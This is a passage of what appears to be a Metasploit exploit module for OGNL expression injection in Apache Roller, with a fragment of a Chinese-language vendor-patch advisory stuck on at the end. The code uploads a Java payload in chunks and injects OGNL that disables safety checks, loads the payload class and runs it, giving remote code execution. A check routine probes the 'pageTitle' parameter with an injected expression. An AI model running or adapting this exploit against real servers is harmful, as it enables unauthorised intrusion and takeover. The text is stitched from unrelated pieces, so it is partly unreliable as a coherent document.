parts = jar.chars.each_slice(chunk_length).map(&:join)
parts.each do |part|
java_upload_part(part, @payload_exe, append)
append = 'true'
end
register_files_for_cleanup("#{@payload_exe}null", "#{@payload_exe}#{@random_suffix}")
cmd = ""
# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
cmd << "#q.setAccessible(true),#q.set(null,true),"
cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
cmd << "#q.setAccessible(true),#q.set(null,false),"
# create classloader
cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new
java.io.File('#{@payload_exe}'+#a).toURI().toURL()}),#a='#{rand_text_alphanumeric(4)}',"
# load class
cmd << "#c=#cl.loadClass('metasploit.Payload'),"
# invoke main method
cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
execute_command(cmd)
end
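# Probe for the OGNL expression injection by having the target evaluate a
# harmless arithmetic expression passed through the reflected 'pageTitle'
# parameter of the Roller login page.
#
# Why the probe is built this way: the previous version drew 1-3 digit addends
# and grepped the body for the unanchored sum, so a small result (or one that
# also appeared in the echoed "a+b" text, a footer year, a numeric id, ...)
# yielded a false Vulnerable. Two four-digit addends give a five-digit sum
# (10000..19998) that is matched on word boundaries only, which makes an
# accidental hit very unlikely. A missing response is reported as Unknown
# rather than Safe, because nothing was proven either way.
#
# @return [Exploit::CheckCode] Vulnerable when the evaluated sum is echoed back,
#   Safe when the page answered 200 without it, Unknown when no answer came.
def check
  # 5000..9999 each, so the sum is always five digits and never a bare single
  # digit that would match almost any HTML page.
  addend_one = 5000 + rand(5000)
  addend_two = 5000 + rand(5000)
  sum = addend_one + addend_two

  res = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path.to_s, "roller-ui", "login.rol"),
    'vars_get' =>
    {
      'pageTitle' => "${new java.lang.Integer(#{addend_one}+#{addend_two})}",
    }
  })

  # No response at all says nothing about the target's vulnerability state.
  return Exploit::CheckCode::Unknown unless res

  # Whole-number match only: an unanchored /sum/ would also hit longer digit
  # runs (timestamps, ids) that merely contain the sum as a substring.
  if res.code == 200 && res.body =~ /\b#{sum}\b/
    return Exploit::CheckCode::Vulnerable
  end

  Exploit::CheckCode::Safe
end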
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: